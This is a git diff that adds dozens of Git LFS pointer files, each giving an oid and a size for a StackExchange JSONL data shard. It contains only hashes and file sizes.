sha256:41bfc7ecf2caf38e62d434eeb65d388115f917e8b56b2191aa6e7dfc2fec9a1d +size 34997918 diff --git a/data/stackexchange/1-1/1671_2289.jsonl b/data/stackexchange/1-1/1671_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1ef81ed23fa7c99fb9b56b9f37f16d5abb18c7df --- /dev/null +++ b/data/stackexchange/1-1/1671_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f2d849717f3212ae299aec458768ecf3ed7826630dd63deff2169c15d58fe3a +size 35499158 diff --git a/data/stackexchange/1-1/1672_2289.jsonl b/data/stackexchange/1-1/1672_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e8471f6a799a5f8e83643c04d1400896a5e27da6 --- /dev/null +++ b/data/stackexchange/1-1/1672_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:24d807aabe45dee81f7579041cf2c4a1941779b09080a88e7e3e32ea1750c1f7 +size 35489118 diff --git a/data/stackexchange/1-1/1673_2289.jsonl b/data/stackexchange/1-1/1673_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..84669fcecfaf4f504db1a28e4e0c1621f949ff49 --- /dev/null +++ b/data/stackexchange/1-1/1673_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:fcbe2835239813484cd1bb4f31541f92857732decedf9634f779f2972404d538 +size 35429419 diff --git a/data/stackexchange/1-1/1674_2289.jsonl b/data/stackexchange/1-1/1674_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..059c05daa65eb1632045fc91038204f9f450c7d3 --- /dev/null +++ b/data/stackexchange/1-1/1674_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3538bbe401e1375324310b1def18c60245219df04b5a2be3a660dacd298b6364 +size 35795297 diff --git a/data/stackexchange/1-1/1675_2289.jsonl b/data/stackexchange/1-1/1675_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..71f3a709670cea4658832bb3e523742180b6d707 --- /dev/null +++ b/data/stackexchange/1-1/1675_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d44572fb1d468091ef9eda0f0982aecd17197ea9e26a724d91933caee9a9860e +size 35223155 diff --git a/data/stackexchange/1-1/1676_2289.jsonl b/data/stackexchange/1-1/1676_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4c0e97702306d7644ab4fde2b6e49ad127ba8901 --- /dev/null +++ b/data/stackexchange/1-1/1676_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bb5c3f5c0bd058f44286ce80b88ee3ef2f30df7609113c2be4c3bb9f052a5b6 +size 35532252 diff --git a/data/stackexchange/1-1/1677_2289.jsonl b/data/stackexchange/1-1/1677_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..91727c971fc36d135b3419b802ebcb517064b389 --- /dev/null +++ b/data/stackexchange/1-1/1677_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:107f98cc1b83b382bc106857ebb9eb8261a0d4b9f3d964f4809f7b2c5eedf3c1 +size 34456636 diff --git a/data/stackexchange/1-1/1678_2289.jsonl b/data/stackexchange/1-1/1678_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9a06b2b8b2db56199fc0b3b5c770b7400d913697 --- /dev/null +++ b/data/stackexchange/1-1/1678_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9468cd05a3b5eff8d52ebadef6ae48583b8a5a09760c1b01b89b800792debfa9 +size 35613267 diff --git a/data/stackexchange/1-1/1679_2289.jsonl b/data/stackexchange/1-1/1679_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ff78a17d54ac6c5f83b364a59e95e4561ac9b0c --- /dev/null +++ b/data/stackexchange/1-1/1679_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1460b84e0db8eb6147639b77bc0369ef3628cadc4678688dfdbcd1bc45e2210c +size 35546511 diff --git a/data/stackexchange/1-1/167_2289.jsonl b/data/stackexchange/1-1/167_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6f253820de2da5d815cef34483cd44a0c01c0051 --- /dev/null +++ b/data/stackexchange/1-1/167_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:81282c336567c769fa05ceac660833a313992d5fa7eed77ec320055e35abdd81 +size 34265058 diff --git a/data/stackexchange/1-1/1680_2289.jsonl b/data/stackexchange/1-1/1680_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5da1e8d5815625aaeff99ccb2855123adc420a2 --- /dev/null +++ b/data/stackexchange/1-1/1680_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:18f221f8385573b4c19c2ac652b99a07bb05c6490050a77e9669d6697d2db710 +size 35080460 diff --git a/data/stackexchange/1-1/1681_2289.jsonl b/data/stackexchange/1-1/1681_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..f25a2fd784143b7d882f432041c2db2a220a5e39 --- /dev/null +++ b/data/stackexchange/1-1/1681_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8f58b67239f10cf56dbab7e0bee598f7acfdb198f71f97f2419841a2e2a5c98a +size 35736025 diff --git a/data/stackexchange/1-1/1682_2289.jsonl b/data/stackexchange/1-1/1682_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..166974dab5e477b3f15891fd98bded3c3027ef14 --- /dev/null +++ b/data/stackexchange/1-1/1682_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d79bedab4d4f3510a6203e325d4145a36b34759bac9bd6945c8faffbd2abbcc5 +size 35791782 diff --git a/data/stackexchange/1-1/1683_2289.jsonl b/data/stackexchange/1-1/1683_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..408f131113b5c985756e7a6096c046f351e75993 --- /dev/null +++ b/data/stackexchange/1-1/1683_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:32da41e73372a6064a7177eb5efc7a84a549089033981acb9a2d81e89ffbc302 +size 35635217 diff --git a/data/stackexchange/1-1/1684_2289.jsonl b/data/stackexchange/1-1/1684_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c70c732e10575f93a7c933a085c13d52ca37dcef --- /dev/null +++ b/data/stackexchange/1-1/1684_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17927d34bc7080ebda949d60aabaffe988704c7261659a2cddabb46e5cfdf727 +size 35163418 diff --git a/data/stackexchange/1-1/1685_2289.jsonl b/data/stackexchange/1-1/1685_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..423395e70eaced889ef7a1b2c2f188f1dce04701 --- /dev/null +++ b/data/stackexchange/1-1/1685_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:093f18304d486882000c82401aabc0ccaed4d5dffbc4ce7ffa2b6b7bb45b5fae +size 35047748 diff --git a/data/stackexchange/1-1/1686_2289.jsonl b/data/stackexchange/1-1/1686_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d5614258e526565ca8f27b1d1fa8f0acbcf2d0f2 --- /dev/null +++ b/data/stackexchange/1-1/1686_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3fbf110be3dc9c92217073666cee668ff780cedbc7c4f2c144c654626657917 +size 35477787 diff --git a/data/stackexchange/1-1/1687_2289.jsonl b/data/stackexchange/1-1/1687_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b727dce6fe79b837df042c37de2ba3723cbbb3aa --- /dev/null +++ b/data/stackexchange/1-1/1687_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ff22bcd8b1d3dcf159f4b00304f7399ed171e357f08ede55f1d2c261acaf563c +size 35312597 diff --git a/data/stackexchange/1-1/1688_2289.jsonl b/data/stackexchange/1-1/1688_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e551977de7f53296600383a6a072e96beb77300f --- /dev/null +++ b/data/stackexchange/1-1/1688_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7d7329eaaafb191041ffb4e013fd1493ff23ff094be0f8057ead857868efec38 +size 34870101 diff --git a/data/stackexchange/1-1/1689_2289.jsonl b/data/stackexchange/1-1/1689_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7d1e5eef1404ca61e6d472a5c62171586370b0c1 --- /dev/null +++ b/data/stackexchange/1-1/1689_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:d642304e41cf34c8208695b3d2a0f5a19566ef370218dcf7aa73ea538aefe383 +size 35541394 diff --git a/data/stackexchange/1-1/168_2289.jsonl b/data/stackexchange/1-1/168_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0f54429d2b5aa7ad89cbc802c1140ef7f5f57cb2 --- /dev/null +++ b/data/stackexchange/1-1/168_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b19b1d0f98a995c979790b0194f69dbf598820a943a67778e4b268c3df57193 +size 35177607 diff --git a/data/stackexchange/1-1/1690_2289.jsonl b/data/stackexchange/1-1/1690_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95ff9dc902c65ac28672662187d2e90ca3289509 --- /dev/null +++ b/data/stackexchange/1-1/1690_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:84993aa232a8b6d4ef0f7a0ae758e28379ceee0fc9a6919d9642a095a1960c0b +size 36089158 diff --git a/data/stackexchange/1-1/1691_2289.jsonl b/data/stackexchange/1-1/1691_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..eff4f7c62b947dd9dfb927dd848a160b728f163d --- /dev/null +++ b/data/stackexchange/1-1/1691_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:767cf4a06e96dfad4333cd68c307781ce49d5280be856b298a7e81807927e786 +size 35496431 diff --git a/data/stackexchange/1-1/1692_2289.jsonl b/data/stackexchange/1-1/1692_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..de6154918ff18f4acea8963e2f3fe0737d717f48 --- /dev/null +++ b/data/stackexchange/1-1/1692_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:093dbc8c5c7fed4bef2322d219fd70a865e99b7859d9928324e8a80a9eb05ae0 +size 35780216 diff --git a/data/stackexchange/1-1/1693_2289.jsonl b/data/stackexchange/1-1/1693_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0af6568ff9e3093c44df6700f33422011cb70ec2 --- /dev/null +++ b/data/stackexchange/1-1/1693_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:48b4eeb78f5476b1cda6f28216afff292305356089e75fd55395891ed3f0ad61 +size 35284510 diff --git a/data/stackexchange/1-1/1694_2289.jsonl b/data/stackexchange/1-1/1694_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c1b30f56673c746f4fa8f4dc036b6f36f6aeffe3 --- /dev/null +++ b/data/stackexchange/1-1/1694_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e008cc21915605e79bf561a449d6922b80d19303a3cd950ef3532634fa91bd4 +size 35645545 diff --git a/data/stackexchange/1-1/1695_2289.jsonl b/data/stackexchange/1-1/1695_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0ccc9f7c3d3c62df51b93d3fa29b15b038df4a56 --- /dev/null +++ b/data/stackexchange/1-1/1695_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:570b5b6d89b24d021d0d9882fd755fe416b48d3c599f45c756a97936c938d1d1 +size 35351400 diff --git a/data/stackexchange/1-1/1696_2289.jsonl b/data/stackexchange/1-1/1696_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..16c2b7aaa2320c531969aaedf33911f39e56afb3 --- /dev/null +++ b/data/stackexchange/1-1/1696_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d968a8b9d58e1ed2fb323984f26d687078dc4ff2e9b383fe83c0b73072a7689c +size 35310316 diff --git a/data/stackexchange/1-1/1697_2289.jsonl b/data/stackexchange/1-1/1697_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..eeedcc54b5714e45102c5209c183a047dd4cf652 --- /dev/null +++ b/data/stackexchange/1-1/1697_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a34f3bc38026f95bbcfb00434cba87cdd01c2da2737e8e01db8c78c9d9cf9218 +size 35467657 diff --git a/data/stackexchange/1-1/1698_2289.jsonl b/data/stackexchange/1-1/1698_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ce41b36e355e2cfdc936db22e5affc8a8bb002db --- /dev/null +++ b/data/stackexchange/1-1/1698_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69bc6964d7ce6278e118c53f34d683e5653ca44128c1c9ffa7f90e0d72221fd4 +size 35317979 diff --git a/data/stackexchange/1-1/1699_2289.jsonl b/data/stackexchange/1-1/1699_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..75d66b4699be86221aeeeee15974149e09f44520 --- /dev/null +++ b/data/stackexchange/1-1/1699_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4c7fbeaf7327d0bc33a8d5f2999c372890b98b97c472e9818a6b3efdf583a18e +size 35460905 diff --git a/data/stackexchange/1-1/169_2289.jsonl b/data/stackexchange/1-1/169_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7298606bfc226885f8b75dc23b1cdda22d03c235 --- /dev/null +++ b/data/stackexchange/1-1/169_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d1a00c1d3eef022f05d780ab734ac5c282ed5d26eb4f44c9cc40d0a3c4e60466 +size 34637198 diff --git a/data/stackexchange/1-1/16_2289.jsonl b/data/stackexchange/1-1/16_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e00cef1b403182b17e2cbd22e1d9038fed4605e8 --- /dev/null +++ b/data/stackexchange/1-1/16_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cebc55f1863f468cd9707bc71d99c22c1cda2797dd73512e8cb1e88b243a211b +size 36493987 diff --git a/data/stackexchange/1-1/1700_2289.jsonl b/data/stackexchange/1-1/1700_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8c4c1fce94650d3fc356edc20a07bbf5f85fa871 --- /dev/null +++ b/data/stackexchange/1-1/1700_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:296a4fa04f69f0094644ea67aa107a1fda8859288122c7897a7377b57b079d28 +size 35775665 diff --git a/data/stackexchange/1-1/1701_2289.jsonl b/data/stackexchange/1-1/1701_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b54a5384302b570b347f1c72099b1e13d0a9d7c --- /dev/null +++ b/data/stackexchange/1-1/1701_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0ce88576f302fd051650024ff076fc97934655c7ba541493bfc10bffcf4d80b7 +size 36090465 diff --git a/data/stackexchange/1-1/1702_2289.jsonl b/data/stackexchange/1-1/1702_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9f67c22fa876ddc1edae242684cc09c659626f23 --- /dev/null +++ b/data/stackexchange/1-1/1702_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:30b234f371b8fc2327c949e61fbbb4e3df59a0b80e4ef9d9eecb9f88f3e75fe9 +size 35629557 diff --git a/data/stackexchange/1-1/1703_2289.jsonl b/data/stackexchange/1-1/1703_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..812530555153166e9686c7148451311f93e2bb5b --- /dev/null +++ b/data/stackexchange/1-1/1703_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:8645d6e346e2fa04effac47eea9e473d8baa2cdfcfd5a0ae8676cb2b55c6fc32 +size 35333483 diff --git a/data/stackexchange/1-1/1704_2289.jsonl b/data/stackexchange/1-1/1704_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1482fd2e4821bcc2cbb14632cd6dd755e29bbf9d --- /dev/null +++ b/data/stackexchange/1-1/1704_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:da78d18f5b6dae27826576c42dde2205e612645ac1cb5695e07080dc80ae4903 +size 35916723 diff --git a/data/stackexchange/1-1/1705_2289.jsonl b/data/stackexchange/1-1/1705_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6bcd6e108af083722b8e692f05ebfbe3f101c73 --- /dev/null +++ b/data/stackexchange/1-1/1705_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1691cf50a6a735b207befcc3f788a57bd1aee85ee43032e4be00dd26ba5b919d +size 36091953 diff --git a/data/stackexchange/1-1/1706_2289.jsonl b/data/stackexchange/1-1/1706_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7667989d3ce5ac2477f55596037bdcec1bfdabc0 --- /dev/null +++ b/data/stackexchange/1-1/1706_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d51e5b3b4975177e215c038e94cfddc242295717f02cbd0896fcc4e3e8685ce +size 35225228 diff --git a/data/stackexchange/1-1/1707_2289.jsonl b/data/stackexchange/1-1/1707_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..18e41d160681c4862890b1b50d383b58470c67b0 --- /dev/null +++ b/data/stackexchange/1-1/1707_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6eb6fa996a84f040f6f3086b39b9577e28c19a287ea56782b33f518332641673 +size 35362912 diff --git a/data/stackexchange/1-1/1708_2289.jsonl b/data/stackexchange/1-1/1708_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..78ff9f65439f1f73f31692f2b432e8b1b65487de --- /dev/null +++ b/data/stackexchange/1-1/1708_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7ef705fcb241bae3577426a8e9c1d67e79a29463cbf23237597930aa33405569 +size 36080153 diff --git a/data/stackexchange/1-1/1709_2289.jsonl b/data/stackexchange/1-1/1709_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b2f2d7e47cd236a6371deba3b6e82f7fc7b6993 --- /dev/null +++ b/data/stackexchange/1-1/1709_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dbc667b18f9e2190b60b326e7378f3ce98c6f9b63ab0ecdeaad3ce5dbbba848b +size 35703290 diff --git a/data/stackexchange/1-1/170_2289.jsonl b/data/stackexchange/1-1/170_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..83e71e519b36bbaa87edd34e7a5c5111fa19c2f1 --- /dev/null +++ b/data/stackexchange/1-1/170_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:60748806547a1c34850f471ed7d475f1ee5667553fbda2f984de900e135b58f4 +size 35590734 diff --git a/data/stackexchange/1-1/1710_2289.jsonl b/data/stackexchange/1-1/1710_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0084eefd65fcea113e1051f0b5f1380f53618037 --- /dev/null +++ b/data/stackexchange/1-1/1710_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1e944fa51d7c1f67b329faada239246e737f146a4f701b21a02d7e4a1f8c582 +size 35550988 diff --git a/data/stackexchange/1-1/1711_2289.jsonl b/data/stackexchange/1-1/1711_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..e0ca77148ce937a7bffb9ab4586c8edf56111439 --- /dev/null +++ b/data/stackexchange/1-1/1711_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b5ee26c64a934416f8f6aac356c45edcdbc438c1afd1884c59f35092072fe23 +size 35704893 diff --git a/data/stackexchange/1-1/1712_2289.jsonl b/data/stackexchange/1-1/1712_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dd0ea7968f0fd35f506c21fb894bccc26fec12d3 --- /dev/null +++ b/data/stackexchange/1-1/1712_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:991dcdc04f86f9297b3d1cb9a9807d38c207edd308f1a1c5a4fc7a7c021a14a7 +size 35583735 diff --git a/data/stackexchange/1-1/1713_2289.jsonl b/data/stackexchange/1-1/1713_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6cc3a4695a12133e3133cca462c1585e586ca4c4 --- /dev/null +++ b/data/stackexchange/1-1/1713_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fc2324b20bc31db2cd338ef4b09fb9c10e9c08815302b2200de7c936e99e2a38 +size 35893332 diff --git a/data/stackexchange/1-1/1714_2289.jsonl b/data/stackexchange/1-1/1714_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..752866f7c3e5464189cdc44ae36e8d04ce46eaa4 --- /dev/null +++ b/data/stackexchange/1-1/1714_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b37e73667fbd1dae26fa062f2ea7f169159ca32886c9f47b9530b33e545e6515 +size 35535003 diff --git a/data/stackexchange/1-1/1715_2289.jsonl b/data/stackexchange/1-1/1715_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..40d0bf2bd03129c0d0e459d84daf156a63902641 --- /dev/null +++ b/data/stackexchange/1-1/1715_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cd7add67a8e39ef2ad6db05247871be709e2ccd469321c80220f45d951ff442d +size 35796263 diff --git a/data/stackexchange/1-1/1716_2289.jsonl b/data/stackexchange/1-1/1716_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..be00410f6636b4e7278499fb9fe7ce68f6206f16 --- /dev/null +++ b/data/stackexchange/1-1/1716_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b9ef4e06acf88300f763746ed0b98e7f705a0b859d234d449488ab2f9bf9ad40 +size 35736502 diff --git a/data/stackexchange/1-1/1717_2289.jsonl b/data/stackexchange/1-1/1717_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86cc112719505a1da9d48c89e0075ffdee41c31f --- /dev/null +++ b/data/stackexchange/1-1/1717_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:139e3e827e8838fb3fe966502f9e829e33f633f26cc369ad42ea15ee693adc43 +size 35686676 diff --git a/data/stackexchange/1-1/1718_2289.jsonl b/data/stackexchange/1-1/1718_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a6ba75b78fff58655fe820190dab05574240135c --- /dev/null +++ b/data/stackexchange/1-1/1718_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bc54663a71c8f685c48e8708c975c353640dff81363236b84d18dc3f43bf592c +size 35711628 diff --git a/data/stackexchange/1-1/1719_2289.jsonl b/data/stackexchange/1-1/1719_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f92df73729f6c64639d5a080199e27d8e75c9aaa --- /dev/null +++ b/data/stackexchange/1-1/1719_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:c66939fe108c03dc139c8c26f0bf7020c70b2a848923115abd349fab0c6a7de2 +size 34718220 diff --git a/data/stackexchange/1-1/171_2289.jsonl b/data/stackexchange/1-1/171_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..14058206cf7d9b4724013eafe19276538dc2649f --- /dev/null +++ b/data/stackexchange/1-1/171_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b76d8dbd74816e8838bf699cd4179a71bb0fee9c1a9b280f125f2fbf2bbe7279 +size 34662934 diff --git a/data/stackexchange/1-1/1720_2289.jsonl b/data/stackexchange/1-1/1720_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3a51976d3ed52487f3c58a1972844bb1e7a1b0e0 --- /dev/null +++ b/data/stackexchange/1-1/1720_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:08c28ed72a90d3a934d3da279f943d1ccdebfeac9080aa12b6d282a46e12e25e +size 34954363 diff --git a/data/stackexchange/1-1/1721_2289.jsonl b/data/stackexchange/1-1/1721_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..523b52b6f033f2a60f60e1ec7aa067e074baf99f --- /dev/null +++ b/data/stackexchange/1-1/1721_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c5cdaab90734c87e35db336c6a7ec8e272a482e016fa45ed704295f255c6df42 +size 35629438 diff --git a/data/stackexchange/1-1/1722_2289.jsonl b/data/stackexchange/1-1/1722_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4a5c64bd662c4a6945dc2bc12bd7859ce2b5d140 --- /dev/null +++ b/data/stackexchange/1-1/1722_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4fbc42e36cebc3b21df3b6f39a309370fe0cecb261dfa2f68d90feaed42b7ca0 +size 35018861 diff --git a/data/stackexchange/1-1/1723_2289.jsonl b/data/stackexchange/1-1/1723_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b156434a269ef0acc19aa9d0cd0ebcf844b95046 --- /dev/null +++ b/data/stackexchange/1-1/1723_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e770a425122acf1a06c8914c4611af359dec3752a6c8a26e5293ba40b955085c +size 35618435 diff --git a/data/stackexchange/1-1/1724_2289.jsonl b/data/stackexchange/1-1/1724_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8373c34460882d5ef18683f88c0bec5a171c709f --- /dev/null +++ b/data/stackexchange/1-1/1724_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:118e76e80f571ca5fb0dbef04206780952cd931186f5f05785eb071cd8f8e101 +size 35199907 diff --git a/data/stackexchange/1-1/1725_2289.jsonl b/data/stackexchange/1-1/1725_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..28ba3e2501434a67e341d396126377e03a6319d1 --- /dev/null +++ b/data/stackexchange/1-1/1725_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e04bd5a792d5a94845500e8b8e3fedd43ca06544decfa3e46382b4c3e3473dbe +size 35942475 diff --git a/data/stackexchange/1-1/1726_2289.jsonl b/data/stackexchange/1-1/1726_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e208538b134b3ae78b4a11a7fd99dcd3916cb726 --- /dev/null +++ b/data/stackexchange/1-1/1726_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:527d72fbd5487825b75d9beaff16cd0d61ce7d8436c8250d116d9a278646d8f2 +size 35726357 diff --git a/data/stackexchange/1-1/1727_2289.jsonl b/data/stackexchange/1-1/1727_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..d19d55753f244d0d32e0631d40ec94e11852fe6e --- /dev/null +++ b/data/stackexchange/1-1/1727_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d64e6af9eef0961632517a62248309c8659e68f7666bf74ebca18b00ab9f7734 +size 35357525 diff --git a/data/stackexchange/1-1/1728_2289.jsonl b/data/stackexchange/1-1/1728_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e35d69fdb729ae12e645fa37bd38f1dd337bc74a --- /dev/null +++ b/data/stackexchange/1-1/1728_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c57f67878d2d53e932c7912fafcdafd27765b27954969bf97878d843f42cf694 +size 35419353 diff --git a/data/stackexchange/1-1/1729_2289.jsonl b/data/stackexchange/1-1/1729_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8745c53c1e7ea45b755b5341fb8f4331f6325e4a --- /dev/null +++ b/data/stackexchange/1-1/1729_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dd12f4390ccd2f168ed92374bbc0147bb037aed85f9a8312cadb6fe312f82a86 +size 